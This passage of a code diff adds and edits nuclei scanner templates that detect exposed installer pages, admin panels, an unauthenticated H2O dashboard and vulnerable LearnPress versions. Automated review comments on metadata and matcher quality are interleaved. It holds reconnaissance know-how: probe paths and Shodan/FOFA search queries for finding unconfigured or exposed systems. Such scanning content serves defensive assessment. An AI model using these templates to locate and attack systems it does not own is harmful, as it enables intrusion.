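Review bot: `description` states the bypass requires an authenticated subscriber-level account, yet the raw request to `/wp-admin/admin-post.php` carries no `Cookie` or other credential and the `name` says `Broken Authentication`, so one of the two is wrong. If the export is reachable without a session the description should say so and the wpscan entry should be re-checked; if it is not, the template cannot match as written and needs a session variable in the request. The word matcher on `End Time`/`Start Time`/`Calendar` together with `text/csv` is reasonable evidence once that precondition is settled.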
@@ -0,0 +1,33 @@ +id: caldera-c2 + +info: + name: Caldera C2 - Detect + author: pussycat0x + severity: info + description: | + MITRE Caldera™ is a cyber security platform designed to easily automate adversary emulation, assist manual red-teams, and automate incident response. + reference: + - https://github.com/mitre/caldera + - https://github.com/montysecurity/C2-Tracker/blob/main/tracker.py + metadata: + verified: true + max-request: 1 + fofa-query: http.favicon.hash:-636718605 + tags: c2,ir,osint,caldera,panel + +http: + - method: GET + path: + - '{{BaseURL}}' + + matchers-condition: and + matchers: + - type: word + part: body + words: + - 'Login | CALDERA' + + - type: status + status: + - 200 +# digest: 4a0a004730450221008ff94687ae1b013643001b71a2043b8bb5aba89b88023d073e9bf9d2378b2dc402202bdb2ed3c0f17da110f0afeecbb6388d8938446c7503c7b8e104cbbd103276bd:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/poc/other/chamilo-installer.yaml b/poc/other/chamilo-installer.yaml index 6f29ac9c3e..1dc8b4824e 100644 --- a/poc/other/chamilo-installer.yaml +++ b/poc/other/chamilo-installer.yaml @@ -4,9 +4,10 @@ info: name: Chamilo Installer Exposure author: DhiyaneshDk severity: high + description: Chamilo is susceptible to the Installation page exposure due to misconfiguration. metadata: - max-request: 1 verified: true + max-request: 2 shodan-query: title:"Chamilo has not been installed" tags: misconfig,chamilo,install,exposure @@ -30,4 +31,4 @@ http: part: body words: - 'Chamilo has not been installed' -# digest: 4b0a00483046022100a53b0ce0460b87667eafa46dce3a5a8e407ebd606fb6cfed279e8ac9cf3a8787022100b5a5b3c4f4b75c06aaa24c492e112052e3818288d55952b903cc2a5b02914b21:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a0046304402205b0756c019bb7b1abbd48a0dc259ed7353203f0f8b43c1ab9ea2c23e06c47cc4022076c08eb4ab70f68d187c606b7148288a27ee88f825dd94d9a6133bdca0eda950:922c64590222798bb761d5b6d8e72950 \ No newline at end of file 
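Review bot: In the chamilo-installer hunks `max-request` is raised from 1 to 2, but the only other change visible in this diff is the added `description`, and the second hunk still shows a single matcher block with no additional path. If no second request was added in the lines outside these hunks, the metadata now overstates the request count and should go back to `max-request: 1`. The `path:` list sits between the two hunks, so this cannot be confirmed from here.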
diff --git a/poc/other/clipbucket-installer.yaml b/poc/other/clipbucket-installer.yaml index 00862cc822..af7d768794 100644 --- a/poc/other/clipbucket-installer.yaml +++ b/poc/other/clipbucket-installer.yaml @@ -4,6 +4,7 @@ info: name: ClipBucket Installer - Exposure author: DhiyaneshDk severity: high + description: ClipBucket is susceptible to the Installation page exposure due to misconfiguration. metadata: verified: true max-request: 1 @@ -26,5 +27,4 @@ http: - type: status status: - 200 - -# digest: 490a00463044022020fdefd08d848f7757e6557588d6124d8c53afc4ce5f92049a6b9ebdbc05853c02203fc0d5b1a38fa0f122f92e3d3e4c20a1c2941894ca3116fabce5c2b5f03f12cc:922c64590222798bb761d5b6d8e72950 +# digest: 4a0a00473045022100b0232e0f9d6cc10a6b6b81af15074c2d3071badba75eb623cd7395ab80c7a0f9022011fb63fbd16492a3889ae16290c0d8af40631603dfecb07a53490e3283c38142:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/poc/other/codeigniter-errorpage.yaml b/poc/other/codeigniter-errorpage.yaml index 915e44a142..3e4d270040 100644 --- a/poc/other/codeigniter-errorpage.yaml +++ b/poc/other/codeigniter-errorpage.yaml @@ -4,6 +4,7 @@ info: name: CodeIgniter - Error Page author: j4vaovo severity: low + description: CodeIgniter error debug are enabled. metadata: verified: true max-request: 1 @@ -37,5 +38,4 @@ http: - 200 - 500 condition: or - -# digest: 4b0a004830460221009601e0b69fb4639e782d38dffe847bddf18dedca5b16925de09f6073af1bf754022100eb48a48d251da19fafead615d7238648332068ee9f6264a6164b283d67350d4a:922c64590222798bb761d5b6d8e72950 +# digest: 4a0a00473045022100e319bcb75ac516a3b64842cee0c3a3a33f986ea077cfe62f49c0696041a6108202203874da1c083c996fb5fce8ab458fee421bf5b1d2c9dbe7646e06cd167c873c99:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/poc/other/combodo-itop-installer.yaml b/poc/other/combodo-itop-installer.yaml index d3cb9791f7..b0fab335b5 100644 --- a/poc/other/combodo-itop-installer.yaml +++ b/poc/other/combodo-itop-installer.yaml 
@@ -4,6 +4,7 @@ info: name: Combodo iTop Installer/Upgrade - Exposure author: DhiyaneshDK severity: high + description: Combodo iTop is susceptible to the Installation page exposure due to misconfiguration. reference: - https://www.itophub.io/wiki/page?id=2_4_0:install:install_wizard metadata: @@ -32,5 +33,4 @@ http: - type: status status: - 200 - -# digest: 4a0a0047304502201f30eff620f897e6028a7996db575d975c409c6c2e420e6bf3d2f254d3bef043022100ca3f0eb24496087bf109d1bdb90f98bca76117e53b6c8fccd0791cac81d5702f:922c64590222798bb761d5b6d8e72950 +# digest: 4a0a004730450220471fdc699623440130dd74256b7869b21664828661f159a94535029f6c2c2e45022100da8b7c1e8bef0e17c904d5fa71cc374b4d1d05bcc995195d8f13adc7a1ace2a8:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/poc/other/connectwise-setup.yaml b/poc/other/connectwise-setup.yaml new file mode 100644 index 0000000000..129746b046 --- /dev/null +++ b/poc/other/connectwise-setup.yaml @@ -0,0 +1,30 @@ +id: connectwise-setup + +info: + name: ConnectWise Setup Wizard - Exposure + author: DhiyaneshDk + severity: high + metadata: + verified: true + max-request: 1 + shodan-query: html:"ContentPanel SetupWizard" + tags: misconfig,exposure,install,connectwise + +http: + - method: GET + path: + - "{{BaseURL}}/SetupWizard.aspx" + + matchers-condition: and + matchers: + - type: word + part: body + words: + - "SetupWizardPage" + - "ContentPanel SetupWizard" + condition: and + + - type: status + status: + - 200 +# digest: 490a0046304402202f47dad19f8e02b2a0a8d30cfa4725100d87c0107b17e79cf622c0d626d5b4020220046f1b19eb9b4ff547894be2403d51c958c338c32a68cb56218b22edca0eea79:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/poc/other/discuz-panel.yaml b/poc/other/discuz-panel.yaml new file mode 100644 index 0000000000..545c74434d --- /dev/null +++ b/poc/other/discuz-panel.yaml 
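Review bot: The new `connectwise-setup` template has no `description` and no `reference`, while every other installer/setup template touched by this patch gained a description line. Add one that states what a hit means, e.g. `description: The ConnectWise setup wizard at /SetupWizard.aspx responds without authentication, which typically indicates an uninitialized instance or a wizard that was never locked down.` and a vendor reference. Severity `high` is justified only if reaching the wizard allows configuration changes; if that was verified, say it in the description rather than leaving the reader to infer it from the severity.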
@@ -0,0 +1,39 @@ +id: discuz-panel + +info: + name: Discuz Panel - Detection + author: ritikchaddha + severity: info + metadata: + verified: true + max-request: 1 + shodan-query: title:"Discuz!" + fofa-query: title="Discuz!" + tags: panel,discuz,detect,login + +http: + - method: GET + path: + - '{{BaseURL}}' + + host-redirects: true + + matchers-condition: and + matchers: + - type: word + part: body + words: + - 'discuz_uid =' + - 'discuz' + - 'Powered by Discuz!' + - 'content="Discuz' + condition: or + + extractors: + - type: regex + part: body + group: 1 + regex: + - 'X([0-9.]+)<\/em><\/p>' + +# digest: 4a0a00473045022100bcff81bd751709da945472bca8a9df1d788b837e2135b3a29d2920f5ce042bfd0220642a1af2f14b51f9e68a337b7f18aeaeb8937e4b0b190e224f11d779eebae311:922c64590222798bb761d5b6d8e72950 diff --git a/poc/other/dokuwiki-panel.yaml b/poc/other/dokuwiki-panel.yaml index 67610dfb38..0d5fc93c02 100644 --- a/poc/other/dokuwiki-panel.yaml +++ b/poc/other/dokuwiki-panel.yaml @@ -9,9 +9,9 @@ info: reference: - https://www.dokuwiki.org/dokuwiki metadata: + verified: true max-request: 1 shodan-query: http.html:"/dokuwiki/" - verified: true tags: panel,dokuwiki,login http: @@ -25,4 +25,4 @@ http: - 'status_code == 200' - 'contains_any(body, "dokuwiki__header", "content=\"DokuWiki", "/dokuwiki/")' condition: and -# digest: 4a0a0047304502205cf03bfe13c982579e2351db963145e343a76c28ffb173d4d42d464a123b658f022100c98770a8909d655ab6cc1a4ba8bcda6d998d0309715c6d932122ec77151e2c60:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100aff86cc1eb14071fcfd62300de3fa1cdf2c42d74319a041e13b80860464bc40f022100b37d25c57207961c4f415d0f14574c20ec45c7a118bacf8db238604e21d3348b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/poc/other/dolphin-installer.yaml b/poc/other/dolphin-installer.yaml index 5426cd872d..cb8b23f40f 100644 --- a/poc/other/dolphin-installer.yaml +++ b/poc/other/dolphin-installer.yaml 
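Review bot: The `discuz-panel` word matcher uses `condition: or` and includes the bare word `'discuz'`, which matches any page that merely mentions Discuz (a footer link, a forum post, a meta keyword) and will tag non-Discuz hosts as panels. The other three entries are specific markup markers; drop the `- 'discuz'` line or replace it with a marker tied to the login form. The extractor regex `'X([0-9.]+)<\/em><\/p>'` is fine as a version hint but is not anchored to a Discuz element, so it may also pull unrelated `X1.2`-style strings from matched pages.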
@@ -4,6 +4,7 @@ info: name: Dolphin Installer - Exposure author: DhiyaneshDk severity: high + description: Dolphin is susceptible to the Installation page exposure due to misconfiguration. metadata: verified: true max-request: 1 @@ -25,5 +26,4 @@ http: - type: status status: - 200 - -# digest: 490a0046304402201b70fd1954e7251511534d89cc5913f5d6d5d30604ab6fd420a23bd2993440e8022004e5b319ec9b365bbefa4a910dc8e3ed2f64070fb069011c01bfb9baa7fca623:922c64590222798bb761d5b6d8e72950 +# digest: 4a0a0047304502207e6b2fd88a257051a5608fae50cd2753b42cbcd9ade619801f1dd865ffcd4524022100ba02eaf7a87dd285bcebb9db846e46e7302c328948a8cc7b01e839447d1be726:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/poc/other/espocrm-installer.yaml b/poc/other/espocrm-installer.yaml new file mode 100644 index 0000000000..520106d974 --- /dev/null +++ b/poc/other/espocrm-installer.yaml @@ -0,0 +1,29 @@ +id: espocrm-installer + +info: + name: Espocrm Installer + author: DhiyaneshDk + severity: high + description: Espocrm is susceptible to the Installation page exposure due to misconfiguration. + metadata: + verified: true + max-request: 1 + shodan-query: html:"Welcome to Espocrm" + tags: misconfig,espocrm,install,exposure + +http: + - method: GET + path: + - '{{BaseURL}}/install/' + + matchers-condition: and + matchers: + - type: word + part: body + words: + - 'EspoCRM Installation' + + - type: status + status: + - 200 +# digest: 4b0a00483046022100f6cf7cdc4e68510f8c1a4808b7e9ec263a30317d83437a3a888ca011977d2880022100801f7ad77b0ef1835e6329d6f4db0c8e5912c4fce349a5c142feb2cb7584e8b6:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/poc/other/graylog-panel.yaml b/poc/other/graylog-panel.yaml new file mode 100644 index 0000000000..26860e57d7 --- /dev/null +++ b/poc/other/graylog-panel.yaml 
@@ -0,0 +1,28 @@ +id: graylog-panel + +info: + name: Graylog Login Panel - Detect + author: righettod + severity: info + description: | + Graylog login panel was detected. + reference: + - https://graylog.org/ + metadata: + verified: true + max-request: 1 + shodan-query: http.title:"Graylog Web Interface" + tags: panel,graylog,login,detect + +http: + - method: GET + path: + - "{{BaseURL}}" + + matchers: + - type: dsl + dsl: + - 'status_code == 200' + - 'contains(body, "<title>Graylog Web Interface")' + condition: and +# digest: 4a0a004730450220483d594c8f2e00d484412209f6f879a9eed6a4ea1a0cdf4ccbbefd5f1333a76e022100b87e837f94f7fa68d8e54cfe42abec642be4ce61c478a24b22b97ae49c13f514:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/poc/other/h2o-dashboard.yaml b/poc/other/h2o-dashboard.yaml new file mode 100644 index 0000000000..d991cdcedb --- /dev/null +++ b/poc/other/h2o-dashboard.yaml @@ -0,0 +1,39 @@ +id: h2o-dashboard + +info: + name: H2O Dashboard - Exposure + author: byt3bl33d3r + severity: high + description: | + H2o dashboard by default has no authentication and can lead to RCE on the host. + metadata: + verified: true + max-request: 1 + shodan-query: title:"H2O Flow" + tags: misconfig,exposure,h2o,ml,unauth + +http: + - method: GET + path: + - "{{BaseURL}}" + + redirects: true + max-redirects: 2 + matchers-condition: and + matchers: + - type: word + part: header + words: + - "X-H2o-Build-Project-Version" + - "X-H2o-Cluster-Id" + condition: and + + - type: word + part: body + words: + - "H2O Flow" + + - type: status + status: + - 200 +# digest: 4b0a00483046022100ee21c15fb3a2cb2198efd560f30f90f725fd4eb8ab56e8e0cca48143e5f8fb0602210094e9651f477ea39f953e7175ce6b94649516d10db3a2484797638c4dabc8bbed:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/poc/other/knowledgetree-installer.yaml b/poc/other/knowledgetree-installer.yaml new file mode 100644 index 0000000000..dd9ec1e510 --- /dev/null 
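Review bot: The `h2o-dashboard` template requires the `X-H2o-Build-Project-Version` header but never captures it, although the build version is exactly what a triager needs to decide whether the exposed Flow UI maps to the RCE path the description mentions. Add a header extractor: `extractors:` / `- type: kval` / `kval: [x_h2o_build_project_version]` (nuclei lowercases header names and replaces `-` with `_` for kval). The description asserts "can lead to RCE on the host" with no `reference:` block; cite the source for that claim so the `high` severity is traceable.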
+++ b/poc/other/knowledgetree-installer.yaml @@ -0,0 +1,29 @@ +id: knowledgetree-installer + +info: + name: KnowledgeTree Installer Exposure + author: ritikchaddha + severity: high + description: KnowledgeTree is susceptible to the Installation page exposure due to misconfiguration. + metadata: + verified: true + max-request: 1 + shodan-query: title:"KnowledgeTree Installer" + tags: misconfig,knowledgetree,install,exposure + +http: + - method: GET + path: + - '{{BaseURL}}/setup/wizard/' + + matchers-condition: and + matchers: + - type: word + part: body + words: + - '<title>KnowledgeTree Installer' + + - type: status + status: + - 200 +# digest: 4a0a00473045022100e2f1ec120a28b166e67a0f55986a6ad132ed10fbbfca68248fd8664467c77b79022026b162ddb6ef3d622c6f373261c0dd625d3af9c967c9c9969cef50dc57960c3d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/poc/other/learnpress-5c26a1848cda845d9b97374472d49eb0.yaml b/poc/other/learnpress-5c26a1848cda845d9b97374472d49eb0.yaml new file mode 100644 index 0000000000..6a3969ed97 --- /dev/null +++ b/poc/other/learnpress-5c26a1848cda845d9b97374472d49eb0.yaml 
@@ -0,0 +1,59 @@ +id: learnpress-5c26a1848cda845d9b97374472d49eb0 + +info: + name: > + LearnPress – WordPress LMS Plugin <= 4.2.7 - Unauthenticated SQL Injection via 'c_only_fields' + author: topscoder + severity: critical + description: > + + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/e495507d-7eac-4f38-ab6f-b8f0809b2be4?source=api-scan + classification: + cvss-metrics: + cvss-score: + cve-id: + metadata: + fofa-query: "wp-content/plugins/learnpress/" + google-query: inurl:"/wp-content/plugins/learnpress/" + shodan-query: 'vuln:' + tags: cve,wordpress,wp-plugin,learnpress,critical + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/learnpress/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "learnpress" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 4.2.7') \ No newline at end of file diff --git a/poc/other/learnpress-fcb8158f71307795525b9840bda82742.yaml b/poc/other/learnpress-fcb8158f71307795525b9840bda82742.yaml new file mode 100644 index 0000000000..d609c6b06f --- /dev/null +++ b/poc/other/learnpress-fcb8158f71307795525b9840bda82742.yaml 
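Review bot: The template is tagged `cve` and carries a `classification:` block, but `cve-id`, `cvss-metrics`, `cvss-score` and `description` are all empty and `shodan-query: 'vuln:'` is a bare prefix, so a `critical` finding arrives with no identifier or explanation to triage against. Fill these from the referenced Wordfence advisory or remove the empty keys and the `cve` tag. The request only reads `readme.txt` and compares `Stable tag` against `<= 4.2.7`; it never exercises the `c_only_fields` injection, so the description should state `Version-based detection only; the SQL injection is not exercised.` so consumers do not treat a hit as confirmed exploitability.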
@@ -0,0 +1,59 @@ +id: learnpress-fcb8158f71307795525b9840bda82742 + +info: + name: > + LearnPress – WordPress LMS Plugin <= 4.2.7 - Unauthenticated SQL Injection via 'c_fields' + author: topscoder + severity: critical + description: > + + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/c2b2671e-0db7-4ba9-b574-a0122959e8fc?source=api-scan + classification: + cvss-metrics: + cvss-score: + cve-id: + metadata: + fofa-query: "wp-content/plugins/learnpress/" + google-query: inurl:"/wp-content/plugins/learnpress/" + shodan-query: 'vuln:' + tags: cve,wordpress,wp-plugin,learnpress,critical + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/learnpress/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "learnpress" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 4.2.7') \ No newline at end of file diff --git a/poc/other/magnolia-installer.yaml b/poc/other/magnolia-installer.yaml index c15dfdeedf..dd035fb9c6 100644 --- a/poc/other/magnolia-installer.yaml +++ b/poc/other/magnolia-installer.yaml @@ -4,6 +4,7 @@ info: name: Magnolia CMS Installer author: pussycat0x severity: info + description: Magnolia CMS is susceptible to the Installation page exposure due to misconfiguration. reference: - https://www.magnolia-cms.com/ metadata: 
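Review bot: This template is request-for-request and matcher-for-matcher identical to `learnpress-5c26a1848cda845d9b97374472d49eb0` added in the same patch (same `readme.txt` path, same `Stable tag` regex, same `<= 4.2.7` bound), so the two will always fire together and differ only in the advisory link. Either consolidate them into one template whose description and references list both parameters (`c_fields`, `c_only_fields`), or at least fill in the empty `description` and `cve-id` so the duplicate hit carries distinct information. As with its sibling, the empty `classification` values and `shodan-query: 'vuln:'` should be completed or removed.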
@@ -33,5 +34,4 @@ http: - type: status status: - 200 - -# digest: 4a0a0047304502204b45c4522d3518f08393aace7888f02139e968db16df30c31e468d02133b2842022100926da46f247014e67615cfdee51cd5136d561a9c56a2ab5183b8edeace338cf4:922c64590222798bb761d5b6d8e72950 +# digest: 4a0a0047304502202fe501faefe0437f5aaf50ed23236750795391092771f723589390f00fdad505022100b75940b659a50b3d784c666f81cb10925f5b16486e7bfe0848db0315105847b7:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/poc/other/mantisbt-installer.yaml b/poc/other/mantisbt-installer.yaml index a0452e518d..8c6527610d 100644 --- a/poc/other/mantisbt-installer.yaml +++ b/poc/other/mantisbt-installer.yaml @@ -4,6 +4,7 @@ info: name: MantisBT Installation Exposure author: DhiyaneshDK severity: high + description: MantisBT is susceptible to the Installation page exposure due to misconfiguration. metadata: verified: true max-request: 1 @@ -30,5 +31,4 @@ http: - type: status status: - 200 - -# digest: 4b0a0048304602210086de8c62065a4b5ef489f0adc7c40c8587166b8f0523ef822cfb1d3789bfb717022100e45271fa2d10673b8e41c3d6bf1120f24d3a94d90a871dc63200bcce129d9a00:922c64590222798bb761d5b6d8e72950 +# digest: 4b0a00483046022100f03dac0390a5cb48ae9d1386bd16e63bd76795f5a5e14f08d8f097ed500ecb9702210089aa21e8714f6796a62c21441b792faa970441fbac2971677497d68a1f349247:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/poc/other/mosparo-install.yaml b/poc/other/mosparo-install.yaml index b40145ccb1..efec8d2b91 100644 --- a/poc/other/mosparo-install.yaml +++ b/poc/other/mosparo-install.yaml @@ -4,6 +4,7 @@ info: name: mosparo Exposed Installation author: DhiyaneshDK severity: high + description: mosparo is susceptible to the Installation page exposure due to misconfiguration. metadata: verified: true max-request: 1 
@@ -24,5 +25,4 @@ http: - type: status status: - 200 - -# digest: 490a0046304402201a7f225231563d8f2b7e8a51395f3ba46036a272da17108f3d8a1fc9f4679d2802201aad6546fc1e94e5f142d0858553c2e81d45ddd461945bcff9b9b31ca285d0ed:922c64590222798bb761d5b6d8e72950 +# digest: 490a004630440220471f0a3247eac57d3ceb5521de7ff051ebbf915f43d2a13d603077a1caabf0c3022040ff4e11fa185170bcac85013249ce0b2ee75cd12758d260584f2209a2d71485:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/poc/other/orangescrum-install.yaml b/poc/other/orangescrum-install.yaml index 55a24cc375..dc3b40d20f 100644 --- a/poc/other/orangescrum-install.yaml +++ b/poc/other/orangescrum-install.yaml @@ -4,6 +4,7 @@ info: name: Orangescrum Exposed Installation author: ritikchaddha severity: high + description: Orangescrum is susceptible to the Installation page exposure due to misconfiguration. metadata: verified: true max-request: 1 @@ -24,5 +25,4 @@ http: - type: status status: - 200 - -# digest: 4b0a004830460221009d02f7c4d64ae6407560f9fca8efc6229037686c81caf8e71986ac3914adcb42022100b2844e3aaa5ee11917491b535c68de6f26fef1544ef4069bcfc1bfad0c285431:922c64590222798bb761d5b6d8e72950 +# digest: 4b0a00483046022100e36721a4892737aa3749b1b9970cf00e6b0605905886136352703c672fa519b5022100e6b2f738351a15d804e3fc3d76f523fba679e89864d5a1cac6c342516cfae12a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/poc/other/ords-panel.yaml b/poc/other/ords-panel.yaml new file mode 100644 index 0000000000..f071267265 --- /dev/null +++ b/poc/other/ords-panel.yaml @@ -0,0 +1,18 @@ +id: ords-panel + +info: + author: 111xnagashy + name: ords-panel + description: Internal panel accessed publicly + severity: high + tags: information disclosure , leak ,admin panel ,internal ,panel + +requests: + - method: GET + path: + - "{{BaseURL}}/ords/f?p=4600:32:0::NO" + matchers: + - type: word + part: body + words: + - "Create Employee" \ No newline at end of file 
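Review bot: `ords-panel` is the only template in this patch without a `# digest:` signature, and it uses the deprecated top-level `requests:` key instead of `http:`, so it will load unsigned (if at all) under current nuclei. The probe path `/ords/f?p=4600:32:0::NO` hard-codes an APEX application id and page number, and the match word `Create Employee` reads like one specific deployment rather than a generic ORDS/APEX check; if this is target-specific it should not be in a general corpus, and if it is generic the `name: ords-panel` (the id repeated), the `severity: high` for a detection with no status check, and the space-laden `tags` all need fixing. At minimum use `tags: oracle,ords,apex,panel,exposure`, give it a human-readable `name`, and add `matchers-condition: and` with a `- type: status` / `status: [200]` matcher.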
diff --git a/poc/other/perfsonar-toolkit.yaml b/poc/other/perfsonar-toolkit.yaml index 405ada767b..338daf2059 100644 --- a/poc/other/perfsonar-toolkit.yaml +++ b/poc/other/perfsonar-toolkit.yaml @@ -4,6 +4,7 @@ info: name: perfSONAR Toolkit - Exposure author: DhiyaneshDk severity: medium + description: perfSONAR Toolkit is exposed. reference: - https://www.facebook.com/photo?fbid=619180260252497&set=pcb.619180283585828 metadata: @@ -30,5 +31,4 @@ http: - type: status status: - 200 - -# digest: 490a0046304402205638ecd73fd2f0814a02b54f227b0e541417ebee9a5caa91679c06a436fae67d02200bdf3f69b6fe38687d1ca930b00e6fab8541725df454f62500d60e302e088d77:922c64590222798bb761d5b6d8e72950 +# digest: 4a0a0047304502205d1e491aa0d5d2691a5a61f3ee04489df76010f8a4e4b338ae6593982bf98e84022100d6ef3d360ca57ca19041b6dcf456214dea2cc17ac405d64fdce12a0f4a12ce2b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/poc/other/posteio-admin-panel.yaml b/poc/other/posteio-admin-panel.yaml index ecb59d395e..c67a13c989 100644 --- a/poc/other/posteio-admin-panel.yaml +++ b/poc/other/posteio-admin-panel.yaml @@ -6,9 +6,9 @@ info: severity: info description: Poste.io login panel was detected. metadata: + verified: true max-request: 1 shodan-query: title:"Administration login" html:"poste<span" - verified: true tags: panel,poste,login,detect http: @@ -28,4 +28,4 @@ http: - type: status status: - 200 -# digest: 490a00463044022078ceda6943caf9eaea8f06370e59df812057432c56ba731d9e290c05cb2b60b5022028bd4da5d8e2525d75aa91d524b6cb60395d3c5f98486b36e5051a47f0443b3b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100b55115aadc034c27bec7b66d3d93be3b401c7bc6daa6af8838f8964b706c981b02205bd21f3d5288e64fc02fcae5a782dfa5ebb3171807164a8bb7686b7eb4ccbf8c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/poc/other/sharefile-storage-server.yaml b/poc/other/sharefile-storage-server.yaml new file mode 100644 index 0000000000..0c8b94a09a 
--- /dev/null +++ b/poc/other/sharefile-storage-server.yaml @@ -0,0 +1,32 @@ +id: sharefile-storage-server + +info: + name: ShareFile Storage Server - Detect + author: DhiyaneshDK + severity: info + metadata: + verified: true + max-request: 1 + shodan-query: title:"ShareFile Storage Server" + tags: tech,citrix,sharefile + +http: + - method: GET + path: + - "{{BaseURL}}" + + host-redirects: true + max-redirects: 2 + + matchers-condition: and + matchers: + - type: word + part: body + words: + - "ShareFile Storage Server" + + - type: status + status: + - 200 + +# digest: 4a0a0047304502207ca5079a2f0c74cbd6b9594958e360176f50fc609bf9de0c27bfdd93f78df544022100f40278d7ff54983742c56073d73db238786d79942ec91b1ccd52c4b1c93924cb:922c64590222798bb761d5b6d8e72950 diff --git a/poc/other/shopware-installer.yaml b/poc/other/shopware-installer.yaml index 308689e28b..a733acf4be 100644 --- a/poc/other/shopware-installer.yaml +++ b/poc/other/shopware-installer.yaml @@ -4,6 +4,7 @@ info: name: Shopware Installer author: DhiyaneshDk severity: high + description: Shopware is susceptible to the Installation page exposure due to misconfiguration. reference: - https://www.shopware.com/en/ metadata: @@ -29,5 +30,4 @@ http: - type: status status: - 200 - -# digest: 4a0a0047304502202b71d5beb7169544e2ac3e1438ba963b75e6e4a2f3841bf6b7d22bd688ffd3f2022100c5f052555a072a2b3ed6df38beed53cd37c7b39a871be80c209628ee2f24d7e8:922c64590222798bb761d5b6d8e72950 +# digest: 4b0a00483046022100c49d7dd7b97eb87d5b4de3f9e09232a82505cd82cf325da8d921f8ae060ba4f4022100a7a8fbaacad106a6f9797a34c058e728821f47099467a86276a92d3bc3a55cd1:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/poc/other/smokeping-grapher.yaml b/poc/other/smokeping-grapher.yaml index f708f3d940..f3557e5172 100644 --- a/poc/other/smokeping-grapher.yaml +++ b/poc/other/smokeping-grapher.yaml 
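Review bot: The new `sharefile-storage-server` template has no `description` and no `reference`, unlike the other detection templates in this patch. Add `description: Citrix ShareFile Storage Server web interface was detected.` and a vendor reference so the `tech` tag has something to point at. Note that the matcher only requires the string `ShareFile Storage Server` in a 200 body; pages that document or link to the product would also match, so a second marker from the actual landing page would make the detection less noisy.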
@@ -4,6 +4,7 @@ info: name: SmokePing Latency Page for Network Latency Grapher author: DhiyaneshDk severity: low + description: SmokePing Latency Page is exposed. reference: - https://www.facebook.com/photo/?fbid=620494143454442&set=a.467014098802448 metadata: @@ -27,5 +28,4 @@ http: - type: status status: - 200 - -# digest: 4a0a00473045022100b5732eafebe6bf8f0befe6e8d98f6b3ed87ec3ff6803b1702afc246414f3fe290220542d31ceced0ebb1011464eebbece7267f47a5c261e8cf2590bbf21296753466:922c64590222798bb761d5b6d8e72950 +# digest: 4b0a0048304602210093977592f924589f38b0d3ce6d54c601887c3757b346a722ef5ce3eaf97bba15022100b554db331a1ef594a70b073a4bd6ea63b6baca597b7df6b1dc8711a9ae9f7e5a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/poc/other/softether-vpn-panel.yaml b/poc/other/softether-vpn-panel.yaml index 3581b61723..9c3056ef53 100644 --- a/poc/other/softether-vpn-panel.yaml +++ b/poc/other/softether-vpn-panel.yaml @@ -7,9 +7,9 @@ info: description: | SoftEther VPN panel was detected. metadata: + verified: true max-request: 1 shodan-query: http.title:"SoftEther VPN Server" - verified: true tags: panel,vpn,softether http: @@ -27,4 +27,4 @@ http: - type: status status: - 202 -# digest: 4a0a0047304502205b2744b4d7eaf8ab595dc3b1ad05f36b1ed2a652cf069a374de602973618a627022100f5ce74d77c78ebe397021ccd13377dc2230d844ca3b10bc487b411ff835694c8:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a0046304402203ea2a620879e215c4dbd1cab9c42a764385f653352b9789f742051f87b453f9002200c2635c46a856f96f399b55e405ff851d578d745600bafc9042054ff408abb14:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/poc/other/spa-cart-installer.yaml b/poc/other/spa-cart-installer.yaml new file mode 100644 index 0000000000..be1b1404b0 --- /dev/null +++ b/poc/other/spa-cart-installer.yaml 
